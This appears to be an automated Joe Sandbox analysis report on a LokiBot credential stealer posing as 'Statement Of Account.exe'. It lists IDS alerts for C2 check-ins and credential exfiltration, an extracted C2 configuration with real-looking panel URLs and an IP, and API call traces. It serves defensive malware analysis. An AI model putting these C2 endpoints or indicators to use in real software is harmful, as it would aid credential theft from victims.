2024-10-27T08:51:54.657779+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:55.818063+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:57.259902+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:58.416005+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:51:59.584177+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:52:00.744111+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:02.147704+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:03.273450+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:05.224737+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:06.371984+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:07.611756+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50073	94.156.177.220	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.220/skipo/five/fre.php"]}

Multi AV Scanner detection for domain / URL

Source: 94.156.177.220/skipo/five/fre.php	Virustotal: Detection: 18%	Perma Link
Source: http://alphastand.trade/alien/fre.php	Virustotal: Detection: 15%	Perma Link
Source: http://alphastand.win/alien/fre.php	Virustotal: Detection: 13%	Perma Link
Source: http://kbfvzoboss.bid/alien/fre.php	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: Statement Of Account.exe	ReversingLabs: Detection: 47%
Source: Statement Of Account.exe	Virustotal: Detection: 68%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Statement Of Account.exe

Joe Sandbox ML: detected

Source: Statement Of Account.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000000.00000003.2057153434.0000000004320000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076396476.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076232041.0000000004230000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102408875.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102240700.0000000004240000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119966294.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119814778.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2138938581.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2135998807.0000000004250000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000000.00000003.2057153434.0000000004320000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076396476.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076232041.0000000004230000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102408875.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102240700.0000000004240000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119966294.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119814778.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2138938581.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2135998807.0000000004250000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 0000000A.00000002.3295715813.0000000000121000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 0000000A.00000002.3295715813.0000000000121000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452126
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	0_2_0045C999
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00436ADE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00434BEE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0045DD7C FindFirstFileW,FindClose,	0_2_0045DD7C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD29
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	0_2_00436D2D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442E1F
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00475FE5
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	3_2_00452126
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	3_2_0045C999
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	3_2_00436ADE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00434BEE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0045DD7C FindFirstFileW,FindClose,	3_2_0045DD7C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	3_2_0044BD29
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	3_2_00436D2D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00442E1F
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_00475FE5
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_0044BF8D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	10_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49755
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49707
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49742
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49761
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49732
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49720
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49798
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49726
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49718
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49861
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49867
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49821
